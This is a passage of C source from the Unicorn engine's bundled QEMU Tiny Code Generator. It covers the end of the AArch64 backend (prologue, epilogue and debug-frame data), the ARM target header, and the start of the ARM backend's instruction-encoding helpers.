tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_V12); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_V13); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_V14); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_V15); s->reserved_regs = 0; tcg_regset_set_reg(s->reserved_regs, TCG_REG_SP); tcg_regset_set_reg(s->reserved_regs, TCG_REG_FP); tcg_regset_set_reg(s->reserved_regs, TCG_REG_TMP); tcg_regset_set_reg(s->reserved_regs, TCG_REG_X18); /* platform register */ tcg_regset_set_reg(s->reserved_regs, TCG_VEC_TMP); } /* Saving pairs: (X19, X20) .. (X27, X28), (X29(fp), X30(lr)). */ #define PUSH_SIZE ((30 - 19 + 1) * 8) #define FRAME_SIZE \ ((PUSH_SIZE \ + TCG_STATIC_CALL_ARGS_SIZE \ + CPU_TEMP_BUF_NLONGS * sizeof(long) \ + TCG_TARGET_STACK_ALIGN - 1) \ & ~(TCG_TARGET_STACK_ALIGN - 1)) /* We're expecting a 2 byte uleb128 encoded value. */ QEMU_BUILD_BUG_ON(FRAME_SIZE >= (1 << 14)); /* We're expecting to use a single ADDI insn. */ QEMU_BUILD_BUG_ON(FRAME_SIZE - PUSH_SIZE > 0xfff); static void tcg_target_qemu_prologue(TCGContext *s) { TCGReg r; /* Push (FP, LR) and allocate space for all saved registers. */ tcg_out_insn(s, 3314, STP, TCG_REG_FP, TCG_REG_LR, TCG_REG_SP, -PUSH_SIZE, 1, 1); /* Set up frame pointer for canonical unwinding. */ tcg_out_movr_sp(s, TCG_TYPE_I64, TCG_REG_FP, TCG_REG_SP); /* Store callee-preserved regs x19..x28. */ for (r = TCG_REG_X19; r <= TCG_REG_X27; r += 2) { int ofs = (r - TCG_REG_X19 + 2) * 8; tcg_out_insn(s, 3314, STP, r, r + 1, TCG_REG_SP, ofs, 1, 0); } /* Make stack space for TCG locals. */ tcg_out_insn(s, 3401, SUBI, TCG_TYPE_I64, TCG_REG_SP, TCG_REG_SP, FRAME_SIZE - PUSH_SIZE); /* Inform TCG about how to find TCG locals with register, offset, size. */ tcg_set_frame(s, TCG_REG_SP, TCG_STATIC_CALL_ARGS_SIZE, CPU_TEMP_BUF_NLONGS * sizeof(long)); #if !defined(CONFIG_SOFTMMU) if (USE_GUEST_BASE) { tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_GUEST_BASE, guest_base); tcg_regset_set_reg(s->reserved_regs, TCG_REG_GUEST_BASE); } #endif tcg_out_mov(s, TCG_TYPE_PTR, TCG_AREG0, tcg_target_call_iarg_regs[0]); tcg_out_insn(s, 3207, BR, tcg_target_call_iarg_regs[1]); /* * Return path for goto_ptr. Set return value to 0, a-la exit_tb, * and fall through to the rest of the epilogue. */ s->code_gen_epilogue = s->code_ptr; tcg_out_movi(s, TCG_TYPE_REG, TCG_REG_X0, 0); /* TB epilogue */ tb_ret_addr = s->code_ptr; /* Remove TCG locals stack space. */ tcg_out_insn(s, 3401, ADDI, TCG_TYPE_I64, TCG_REG_SP, TCG_REG_SP, FRAME_SIZE - PUSH_SIZE); /* Restore registers x19..x28. */ for (r = TCG_REG_X19; r <= TCG_REG_X27; r += 2) { int ofs = (r - TCG_REG_X19 + 2) * 8; tcg_out_insn(s, 3314, LDP, r, r + 1, TCG_REG_SP, ofs, 1, 0); } /* Pop (FP, LR), restore SP to previous frame. */ tcg_out_insn(s, 3314, LDP, TCG_REG_FP, TCG_REG_LR, TCG_REG_SP, PUSH_SIZE, 0, 1); tcg_out_insn(s, 3207, RET, TCG_REG_LR); } static void tcg_out_nop_fill(tcg_insn_unit *p, int count) { int i; for (i = 0; i < count; ++i) { p[i] = NOP; } } typedef struct { DebugFrameHeader h; uint8_t fde_def_cfa[4]; uint8_t fde_reg_ofs[24]; } DebugFrame; #define ELF_HOST_MACHINE EM_AARCH64 static const DebugFrame debug_frame = { .h.cie.len = sizeof(DebugFrameCIE)-4, /* length after .len member */ .h.cie.id = -1, .h.cie.version = 1, .h.cie.code_align = 1, .h.cie.data_align = 0x78, /* sleb128 -8 */ .h.cie.return_column = TCG_REG_LR, /* Total FDE size does not include the "len" member. 
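   Each pair in fde_reg_ofs is a DW_CFA_offset op: 0x80 plus the DWARF
   register number, followed by a factored offset that the unwinder
   multiplies by data_align (-8) to locate the saved register below the CFA.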
*/
    .h.fde.len = sizeof(DebugFrame) - offsetof(DebugFrame, h.fde.cie_offset),

    .fde_def_cfa = {
        12, TCG_REG_SP,                 /* DW_CFA_def_cfa sp, ... */
        (FRAME_SIZE & 0x7f) | 0x80,     /* ... uleb128 FRAME_SIZE */
        (FRAME_SIZE >> 7)
    },
    .fde_reg_ofs = {
        0x80 + 28, 1,                   /* DW_CFA_offset, x28, -8 */
        0x80 + 27, 2,                   /* DW_CFA_offset, x27, -16 */
        0x80 + 26, 3,                   /* DW_CFA_offset, x26, -24 */
        0x80 + 25, 4,                   /* DW_CFA_offset, x25, -32 */
        0x80 + 24, 5,                   /* DW_CFA_offset, x24, -40 */
        0x80 + 23, 6,                   /* DW_CFA_offset, x23, -48 */
        0x80 + 22, 7,                   /* DW_CFA_offset, x22, -56 */
        0x80 + 21, 8,                   /* DW_CFA_offset, x21, -64 */
        0x80 + 20, 9,                   /* DW_CFA_offset, x20, -72 */
        0x80 + 19, 10,                  /* DW_CFA_offset, x19, -80 */
        0x80 + 30, 11,                  /* DW_CFA_offset, lr, -88 */
        0x80 + 29, 12,                  /* DW_CFA_offset, fp, -96 */
    }
};

void tcg_register_jit(TCGContext *s, void *buf, size_t buf_size)
{
    tcg_register_jit_int(s, buf, buf_size, &debug_frame, sizeof(debug_frame));
}

unicorn-2.1.1/qemu/tcg/aarch64/tcg-target.opc.h

/*
 * Copyright (c) 2019 Linaro
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or
 * (at your option) any later version.
 *
 * See the COPYING file in the top-level directory for details.
 *
 * Target-specific opcodes for host vector expansion.  These will be
 * emitted by tcg_expand_vec_op.  For those familiar with GCC internals,
 * consider these to be UNSPEC with names.
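 *
 * Each DEF(name, oargs, iargs, cargs, flags) entry declares a backend
 * opcode INDEX_op_<name> with that many output, input and constant
 * arguments; IMPLVEC marks it as a vector opcode provided by this backend.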
*/
DEF(aa64_sshl_vec, 1, 2, 0, IMPLVEC)

unicorn-2.1.1/qemu/tcg/arm/tcg-target.h

/*
 * Tiny Code Generator for QEMU
 *
 * Copyright (c) 2008 Fabrice Bellard
 * Copyright (c) 2008 Andrzej Zaborowski
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
 * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 * THE SOFTWARE.
 */

#ifndef ARM_TCG_TARGET_H
#define ARM_TCG_TARGET_H

/* The __ARM_ARCH define is provided by gcc 4.8.  Construct it otherwise.
*/ #ifndef __ARM_ARCH # if defined(__ARM_ARCH_7__) || defined(__ARM_ARCH_7A__) \ || defined(__ARM_ARCH_7R__) || defined(__ARM_ARCH_7M__) \ || defined(__ARM_ARCH_7EM__) # define __ARM_ARCH 7 # elif defined(__ARM_ARCH_6__) || defined(__ARM_ARCH_6J__) \ || defined(__ARM_ARCH_6Z__) || defined(__ARM_ARCH_6ZK__) \ || defined(__ARM_ARCH_6K__) || defined(__ARM_ARCH_6T2__) # define __ARM_ARCH 6 # elif defined(__ARM_ARCH_5__) || defined(__ARM_ARCH_5E__) \ || defined(__ARM_ARCH_5T__) || defined(__ARM_ARCH_5TE__) \ || defined(__ARM_ARCH_5TEJ__) # define __ARM_ARCH 5 # else # define __ARM_ARCH 4 # endif #endif extern int arm_arch; #if defined(__ARM_ARCH_5T__) \ || defined(__ARM_ARCH_5TE__) || defined(__ARM_ARCH_5TEJ__) # define use_armv5t_instructions 1 #else # define use_armv5t_instructions use_armv6_instructions #endif #define use_armv6_instructions (__ARM_ARCH >= 6 || arm_arch >= 6) #define use_armv7_instructions (__ARM_ARCH >= 7 || arm_arch >= 7) #undef TCG_TARGET_STACK_GROWSUP #define TCG_TARGET_INSN_UNIT_SIZE 4 #define TCG_TARGET_TLB_DISPLACEMENT_BITS 16 typedef enum { TCG_REG_R0 = 0, TCG_REG_R1, TCG_REG_R2, TCG_REG_R3, TCG_REG_R4, TCG_REG_R5, TCG_REG_R6, TCG_REG_R7, TCG_REG_R8, TCG_REG_R9, TCG_REG_R10, TCG_REG_R11, TCG_REG_R12, TCG_REG_R13, TCG_REG_R14, TCG_REG_PC, } TCGReg; #define TCG_TARGET_NB_REGS 16 #ifndef __ARM_ARCH_EXT_IDIV__ extern bool use_idiv_instructions; // Unicorn: Don't have the same name with macro #endif /* used for function call generation */ #define TCG_REG_CALL_STACK TCG_REG_R13 #define TCG_TARGET_STACK_ALIGN 8 #define TCG_TARGET_CALL_ALIGN_ARGS 1 #define TCG_TARGET_CALL_STACK_OFFSET 0 /* optional instructions */ #define TCG_TARGET_HAS_ext8s_i32 1 #define TCG_TARGET_HAS_ext16s_i32 1 #define TCG_TARGET_HAS_ext8u_i32 0 /* and r0, r1, #0xff */ #define TCG_TARGET_HAS_ext16u_i32 1 #define TCG_TARGET_HAS_bswap16_i32 1 #define TCG_TARGET_HAS_bswap32_i32 1 #define TCG_TARGET_HAS_not_i32 1 #define TCG_TARGET_HAS_neg_i32 1 #define TCG_TARGET_HAS_rot_i32 1 #define TCG_TARGET_HAS_andc_i32 1 #define TCG_TARGET_HAS_orc_i32 0 #define TCG_TARGET_HAS_eqv_i32 0 #define TCG_TARGET_HAS_nand_i32 0 #define TCG_TARGET_HAS_nor_i32 0 #define TCG_TARGET_HAS_clz_i32 use_armv5t_instructions #define TCG_TARGET_HAS_ctz_i32 use_armv7_instructions #define TCG_TARGET_HAS_ctpop_i32 0 #define TCG_TARGET_HAS_deposit_i32 use_armv7_instructions #define TCG_TARGET_HAS_extract_i32 use_armv7_instructions #define TCG_TARGET_HAS_sextract_i32 use_armv7_instructions #define TCG_TARGET_HAS_extract2_i32 1 #define TCG_TARGET_HAS_movcond_i32 1 #define TCG_TARGET_HAS_mulu2_i32 1 #define TCG_TARGET_HAS_muls2_i32 1 #define TCG_TARGET_HAS_muluh_i32 0 #define TCG_TARGET_HAS_mulsh_i32 0 #ifdef __ARM_ARCH_EXT_IDIV__ #define TCG_TARGET_HAS_div_i32 1 #else #define TCG_TARGET_HAS_div_i32 use_idiv_instructions #endif #define TCG_TARGET_HAS_rem_i32 0 #define TCG_TARGET_HAS_goto_ptr 1 #define TCG_TARGET_HAS_direct_jump 0 enum { TCG_AREG0 = TCG_REG_R6, }; #define TCG_TARGET_DEFAULT_MO (0) #define TCG_TARGET_HAS_MEMORY_BSWAP 1 static inline void flush_icache_range(uintptr_t start, uintptr_t stop) { __builtin___clear_cache((char *) start, (char *) stop); } /* not defined -- call should be eliminated at compile time */ void tb_target_set_jmp_target(uintptr_t, uintptr_t, uintptr_t); #ifdef CONFIG_SOFTMMU #define TCG_TARGET_NEED_LDST_LABELS #endif #define TCG_TARGET_NEED_POOL_LABELS #endif 
unicorn-2.1.1/qemu/tcg/arm/tcg-target.inc.c

/*
 * Tiny Code Generator for QEMU
 *
 * Copyright (c) 2008 Andrzej Zaborowski
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
 * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 * THE SOFTWARE.
 */

#include "elf.h"
#include "../tcg-pool.inc.c"

int arm_arch = __ARM_ARCH;

#ifndef __ARM_ARCH_EXT_IDIV__
bool use_idiv_instructions;
#endif

/* ??? Ought to think about changing CONFIG_SOFTMMU to always defined.
*/ #ifdef CONFIG_SOFTMMU # define USING_SOFTMMU 1 #else # define USING_SOFTMMU 0 #endif #ifdef CONFIG_DEBUG_TCG static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { "%r0", "%r1", "%r2", "%r3", "%r4", "%r5", "%r6", "%r7", "%r8", "%r9", "%r10", "%r11", "%r12", "%r13", "%r14", "%pc", }; #endif static const int tcg_target_reg_alloc_order[] = { TCG_REG_R4, TCG_REG_R5, TCG_REG_R6, TCG_REG_R7, TCG_REG_R8, TCG_REG_R9, TCG_REG_R10, TCG_REG_R11, TCG_REG_R13, TCG_REG_R0, TCG_REG_R1, TCG_REG_R2, TCG_REG_R3, TCG_REG_R12, TCG_REG_R14, }; static const int tcg_target_call_iarg_regs[4] = { TCG_REG_R0, TCG_REG_R1, TCG_REG_R2, TCG_REG_R3 }; static const int tcg_target_call_oarg_regs[2] = { TCG_REG_R0, TCG_REG_R1 }; #define TCG_REG_TMP TCG_REG_R12 enum arm_cond_code_e { COND_EQ = 0x0, COND_NE = 0x1, COND_CS = 0x2, /* Unsigned greater or equal */ COND_CC = 0x3, /* Unsigned less than */ COND_MI = 0x4, /* Negative */ COND_PL = 0x5, /* Zero or greater */ COND_VS = 0x6, /* Overflow */ COND_VC = 0x7, /* No overflow */ COND_HI = 0x8, /* Unsigned greater than */ COND_LS = 0x9, /* Unsigned less or equal */ COND_GE = 0xa, COND_LT = 0xb, COND_GT = 0xc, COND_LE = 0xd, COND_AL = 0xe, }; #define TO_CPSR (1 << 20) #define SHIFT_IMM_LSL(im) (((im) << 7) | 0x00) #define SHIFT_IMM_LSR(im) (((im) << 7) | 0x20) #define SHIFT_IMM_ASR(im) (((im) << 7) | 0x40) #define SHIFT_IMM_ROR(im) (((im) << 7) | 0x60) #define SHIFT_REG_LSL(rs) (((rs) << 8) | 0x10) #define SHIFT_REG_LSR(rs) (((rs) << 8) | 0x30) #define SHIFT_REG_ASR(rs) (((rs) << 8) | 0x50) #define SHIFT_REG_ROR(rs) (((rs) << 8) | 0x70) typedef enum { ARITH_AND = 0x0 << 21, ARITH_EOR = 0x1 << 21, ARITH_SUB = 0x2 << 21, ARITH_RSB = 0x3 << 21, ARITH_ADD = 0x4 << 21, ARITH_ADC = 0x5 << 21, ARITH_SBC = 0x6 << 21, ARITH_RSC = 0x7 << 21, ARITH_TST = 0x8 << 21 | TO_CPSR, ARITH_CMP = 0xa << 21 | TO_CPSR, ARITH_CMN = 0xb << 21 | TO_CPSR, ARITH_ORR = 0xc << 21, ARITH_MOV = 0xd << 21, ARITH_BIC = 0xe << 21, ARITH_MVN = 0xf << 21, INSN_CLZ = 0x016f0f10, INSN_RBIT = 0x06ff0f30, INSN_LDR_IMM = 0x04100000, INSN_LDR_REG = 0x06100000, INSN_STR_IMM = 0x04000000, INSN_STR_REG = 0x06000000, INSN_LDRH_IMM = 0x005000b0, INSN_LDRH_REG = 0x001000b0, INSN_LDRSH_IMM = 0x005000f0, INSN_LDRSH_REG = 0x001000f0, INSN_STRH_IMM = 0x004000b0, INSN_STRH_REG = 0x000000b0, INSN_LDRB_IMM = 0x04500000, INSN_LDRB_REG = 0x06500000, INSN_LDRSB_IMM = 0x005000d0, INSN_LDRSB_REG = 0x001000d0, INSN_STRB_IMM = 0x04400000, INSN_STRB_REG = 0x06400000, INSN_LDRD_IMM = 0x004000d0, INSN_LDRD_REG = 0x000000d0, INSN_STRD_IMM = 0x004000f0, INSN_STRD_REG = 0x000000f0, INSN_DMB_ISH = 0xf57ff05b, INSN_DMB_MCR = 0xee070fba, /* Architected nop introduced in v6k. */ /* ??? This is an MSR (imm) 0,0,0 insn. Anyone know if this also Just So Happened to do nothing on pre-v6k so that we don't need to conditionalize it? */ INSN_NOP_v6k = 0xe320f000, /* Otherwise the assembler uses mov r0,r0 */ INSN_NOP_v4 = (COND_AL << 28) | ARITH_MOV, } ARMInsn; #define INSN_NOP (use_armv7_instructions ? 
INSN_NOP_v6k : INSN_NOP_v4) static const uint8_t tcg_cond_to_arm_cond[] = { [TCG_COND_EQ] = COND_EQ, [TCG_COND_NE] = COND_NE, [TCG_COND_LT] = COND_LT, [TCG_COND_GE] = COND_GE, [TCG_COND_LE] = COND_LE, [TCG_COND_GT] = COND_GT, /* unsigned */ [TCG_COND_LTU] = COND_CC, [TCG_COND_GEU] = COND_CS, [TCG_COND_LEU] = COND_LS, [TCG_COND_GTU] = COND_HI, }; static inline bool reloc_pc24(tcg_insn_unit *code_ptr, tcg_insn_unit *target) { ptrdiff_t offset = (tcg_ptr_byte_diff(target, code_ptr) - 8) >> 2; if (offset == sextract32(offset, 0, 24)) { *code_ptr = (*code_ptr & ~0xffffff) | (offset & 0xffffff); return true; } return false; } static inline bool reloc_pc13(tcg_insn_unit *code_ptr, tcg_insn_unit *target) { ptrdiff_t offset = tcg_ptr_byte_diff(target, code_ptr) - 8; if (offset >= -0xfff && offset <= 0xfff) { tcg_insn_unit insn = *code_ptr; bool u = (offset >= 0); if (!u) { offset = -offset; } insn = deposit32(insn, 23, 1, u); insn = deposit32(insn, 0, 12, offset); *code_ptr = insn; return true; } return false; } static bool patch_reloc(tcg_insn_unit *code_ptr, int type, intptr_t value, intptr_t addend) { tcg_debug_assert(addend == 0); if (type == R_ARM_PC24) { return reloc_pc24(code_ptr, (tcg_insn_unit *)value); } else if (type == R_ARM_PC13) { return reloc_pc13(code_ptr, (tcg_insn_unit *)value); } else { g_assert_not_reached(); } } #define TCG_CT_CONST_ARM 0x100 #define TCG_CT_CONST_INV 0x200 #define TCG_CT_CONST_NEG 0x400 #define TCG_CT_CONST_ZERO 0x800 /* parse target specific constraints */ static const char *target_parse_constraint(TCGArgConstraint *ct, const char *ct_str, TCGType type) { switch (*ct_str++) { case 'I': ct->ct |= TCG_CT_CONST_ARM; break; case 'K': ct->ct |= TCG_CT_CONST_INV; break; case 'N': /* The gcc constraint letter is L, already used here. */ ct->ct |= TCG_CT_CONST_NEG; break; case 'Z': ct->ct |= TCG_CT_CONST_ZERO; break; case 'r': ct->ct |= TCG_CT_REG; ct->u.regs = 0xffff; break; /* qemu_ld address */ case 'l': ct->ct |= TCG_CT_REG; ct->u.regs = 0xffff; #ifdef CONFIG_SOFTMMU /* r0-r2,lr will be overwritten when reading the tlb entry, so don't use these. */ tcg_regset_reset_reg(ct->u.regs, TCG_REG_R0); tcg_regset_reset_reg(ct->u.regs, TCG_REG_R1); tcg_regset_reset_reg(ct->u.regs, TCG_REG_R2); tcg_regset_reset_reg(ct->u.regs, TCG_REG_R3); tcg_regset_reset_reg(ct->u.regs, TCG_REG_R14); #endif break; /* qemu_st address & data */ case 's': ct->ct |= TCG_CT_REG; ct->u.regs = 0xffff; /* r0-r2 will be overwritten when reading the tlb entry (softmmu only) and r0-r1 doing the byte swapping, so don't use these. */ tcg_regset_reset_reg(ct->u.regs, TCG_REG_R0); tcg_regset_reset_reg(ct->u.regs, TCG_REG_R1); #if defined(CONFIG_SOFTMMU) /* Avoid clashes with registers being used for helper args */ tcg_regset_reset_reg(ct->u.regs, TCG_REG_R2); #if TARGET_LONG_BITS == 64 /* Avoid clashes with registers being used for helper args */ tcg_regset_reset_reg(ct->u.regs, TCG_REG_R3); #endif tcg_regset_reset_reg(ct->u.regs, TCG_REG_R14); #endif break; default: return NULL; } return ct_str; } static inline uint32_t rotl(uint32_t val, int n) { return (val << n) | (val >> (32 - n)); } /* ARM immediates for ALU instructions are made of an unsigned 8-bit right-rotated by an even amount between 0 and 30. 
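   For example, 0xff000000 is 0xff rotated right by 8, so encode_imm
   returns 8, while 0x101 spans nine bits and is rejected with -1.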
*/ static inline int encode_imm(uint32_t imm) { int shift; /* simple case, only lower bits */ if ((imm & ~0xff) == 0) return 0; /* then try a simple even shift */ shift = ctz32(imm) & ~1; if (((imm >> shift) & ~0xff) == 0) return 32 - shift; /* now try harder with rotations */ if ((rotl(imm, 2) & ~0xff) == 0) return 2; if ((rotl(imm, 4) & ~0xff) == 0) return 4; if ((rotl(imm, 6) & ~0xff) == 0) return 6; /* imm can't be encoded */ return -1; } static inline int check_fit_imm(uint32_t imm) { return encode_imm(imm) >= 0; } /* Test if a constant matches the constraint. * TODO: define constraints for: * * ldr/str offset: between -0xfff and 0xfff * ldrh/strh offset: between -0xff and 0xff * mov operand2: values represented with x << (2 * y), x < 0x100 * add, sub, eor...: ditto */ static inline int tcg_target_const_match(tcg_target_long val, TCGType type, const TCGArgConstraint *arg_ct) { int ct; ct = arg_ct->ct; if (ct & TCG_CT_CONST) { return 1; } else if ((ct & TCG_CT_CONST_ARM) && check_fit_imm(val)) { return 1; } else if ((ct & TCG_CT_CONST_INV) && check_fit_imm(~val)) { return 1; } else if ((ct & TCG_CT_CONST_NEG) && check_fit_imm(-val)) { return 1; } else if ((ct & TCG_CT_CONST_ZERO) && val == 0) { return 1; } else { return 0; } } static inline void tcg_out_b(TCGContext *s, int cond, int32_t offset) { tcg_out32(s, (cond << 28) | 0x0a000000 | (((offset - 8) >> 2) & 0x00ffffff)); } static inline void tcg_out_bl(TCGContext *s, int cond, int32_t offset) { tcg_out32(s, (cond << 28) | 0x0b000000 | (((offset - 8) >> 2) & 0x00ffffff)); } static inline void tcg_out_blx(TCGContext *s, int cond, int rn) { tcg_out32(s, (cond << 28) | 0x012fff30 | rn); } static inline void tcg_out_blx_imm(TCGContext *s, int32_t offset) { tcg_out32(s, 0xfa000000 | ((offset & 2) << 23) | (((offset - 8) >> 2) & 0x00ffffff)); } static inline void tcg_out_dat_reg(TCGContext *s, int cond, int opc, int rd, int rn, int rm, int shift) { tcg_out32(s, (cond << 28) | (0 << 25) | opc | (rn << 16) | (rd << 12) | shift | rm); } static inline void tcg_out_nop(TCGContext *s) { tcg_out32(s, INSN_NOP); } static inline void tcg_out_mov_reg(TCGContext *s, int cond, int rd, int rm) { /* Simple reg-reg move, optimising out the 'do nothing' case */ if (rd != rm) { tcg_out_dat_reg(s, cond, ARITH_MOV, rd, 0, rm, SHIFT_IMM_LSL(0)); } } static inline void tcg_out_bx(TCGContext *s, int cond, TCGReg rn) { /* Unless the C portion of QEMU is compiled as thumb, we don't actually need true BX semantics; merely a branch to an address held in a register. */ if (use_armv5t_instructions) { tcg_out32(s, (cond << 28) | 0x012fff10 | rn); } else { tcg_out_mov_reg(s, cond, TCG_REG_PC, rn); } } static inline void tcg_out_dat_imm(TCGContext *s, int cond, int opc, int rd, int rn, int im) { tcg_out32(s, (cond << 28) | (1 << 25) | opc | (rn << 16) | (rd << 12) | im); } /* Note that this routine is used for both LDR and LDRH formats, so we do not wish to include an immediate shift at this point. 
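   The u, p and w arguments of the helpers below map to the ARM U
   (add vs subtract offset), P (pre vs post index) and W (base writeback)
   encoding bits.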
*/ static void tcg_out_memop_r(TCGContext *s, int cond, ARMInsn opc, TCGReg rt, TCGReg rn, TCGReg rm, bool u, bool p, bool w) { tcg_out32(s, (cond << 28) | opc | (u << 23) | (p << 24) | (w << 21) | (rn << 16) | (rt << 12) | rm); } static void tcg_out_memop_8(TCGContext *s, int cond, ARMInsn opc, TCGReg rt, TCGReg rn, int imm8, bool p, bool w) { bool u = 1; if (imm8 < 0) { imm8 = -imm8; u = 0; } tcg_out32(s, (cond << 28) | opc | (u << 23) | (p << 24) | (w << 21) | (rn << 16) | (rt << 12) | ((imm8 & 0xf0) << 4) | (imm8 & 0xf)); } static void tcg_out_memop_12(TCGContext *s, int cond, ARMInsn opc, TCGReg rt, TCGReg rn, int imm12, bool p, bool w) { bool u = 1; if (imm12 < 0) { imm12 = -imm12; u = 0; } tcg_out32(s, (cond << 28) | opc | (u << 23) | (p << 24) | (w << 21) | (rn << 16) | (rt << 12) | imm12); } static inline void tcg_out_ld32_12(TCGContext *s, int cond, TCGReg rt, TCGReg rn, int imm12) { tcg_out_memop_12(s, cond, INSN_LDR_IMM, rt, rn, imm12, 1, 0); } static inline void tcg_out_st32_12(TCGContext *s, int cond, TCGReg rt, TCGReg rn, int imm12) { tcg_out_memop_12(s, cond, INSN_STR_IMM, rt, rn, imm12, 1, 0); } static inline void tcg_out_ld32_r(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_LDR_REG, rt, rn, rm, 1, 1, 0); } static inline void tcg_out_st32_r(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_STR_REG, rt, rn, rm, 1, 1, 0); } static inline void tcg_out_ldrd_8(TCGContext *s, int cond, TCGReg rt, TCGReg rn, int imm8) { tcg_out_memop_8(s, cond, INSN_LDRD_IMM, rt, rn, imm8, 1, 0); } static inline void tcg_out_ldrd_r(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_LDRD_REG, rt, rn, rm, 1, 1, 0); } static inline void tcg_out_ldrd_rwb(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_LDRD_REG, rt, rn, rm, 1, 1, 1); } static inline void tcg_out_strd_8(TCGContext *s, int cond, TCGReg rt, TCGReg rn, int imm8) { tcg_out_memop_8(s, cond, INSN_STRD_IMM, rt, rn, imm8, 1, 0); } static inline void tcg_out_strd_r(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_STRD_REG, rt, rn, rm, 1, 1, 0); } /* Register pre-increment with base writeback. 
*/ static inline void tcg_out_ld32_rwb(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_LDR_REG, rt, rn, rm, 1, 1, 1); } static inline void tcg_out_st32_rwb(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_STR_REG, rt, rn, rm, 1, 1, 1); } static inline void tcg_out_ld16u_8(TCGContext *s, int cond, TCGReg rt, TCGReg rn, int imm8) { tcg_out_memop_8(s, cond, INSN_LDRH_IMM, rt, rn, imm8, 1, 0); } static inline void tcg_out_st16_8(TCGContext *s, int cond, TCGReg rt, TCGReg rn, int imm8) { tcg_out_memop_8(s, cond, INSN_STRH_IMM, rt, rn, imm8, 1, 0); } static inline void tcg_out_ld16u_r(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_LDRH_REG, rt, rn, rm, 1, 1, 0); } static inline void tcg_out_st16_r(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_STRH_REG, rt, rn, rm, 1, 1, 0); } static inline void tcg_out_ld16s_8(TCGContext *s, int cond, TCGReg rt, TCGReg rn, int imm8) { tcg_out_memop_8(s, cond, INSN_LDRSH_IMM, rt, rn, imm8, 1, 0); } static inline void tcg_out_ld16s_r(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_LDRSH_REG, rt, rn, rm, 1, 1, 0); } static inline void tcg_out_ld8_12(TCGContext *s, int cond, TCGReg rt, TCGReg rn, int imm12) { tcg_out_memop_12(s, cond, INSN_LDRB_IMM, rt, rn, imm12, 1, 0); } static inline void tcg_out_st8_12(TCGContext *s, int cond, TCGReg rt, TCGReg rn, int imm12) { tcg_out_memop_12(s, cond, INSN_STRB_IMM, rt, rn, imm12, 1, 0); } static inline void tcg_out_ld8_r(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_LDRB_REG, rt, rn, rm, 1, 1, 0); } static inline void tcg_out_st8_r(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_STRB_REG, rt, rn, rm, 1, 1, 0); } static inline void tcg_out_ld8s_8(TCGContext *s, int cond, TCGReg rt, TCGReg rn, int imm8) { tcg_out_memop_8(s, cond, INSN_LDRSB_IMM, rt, rn, imm8, 1, 0); } static inline void tcg_out_ld8s_r(TCGContext *s, int cond, TCGReg rt, TCGReg rn, TCGReg rm) { tcg_out_memop_r(s, cond, INSN_LDRSB_REG, rt, rn, rm, 1, 1, 0); } static void tcg_out_movi_pool(TCGContext *s, int cond, int rd, uint32_t arg) { new_pool_label(s, arg, R_ARM_PC13, s->code_ptr, 0); 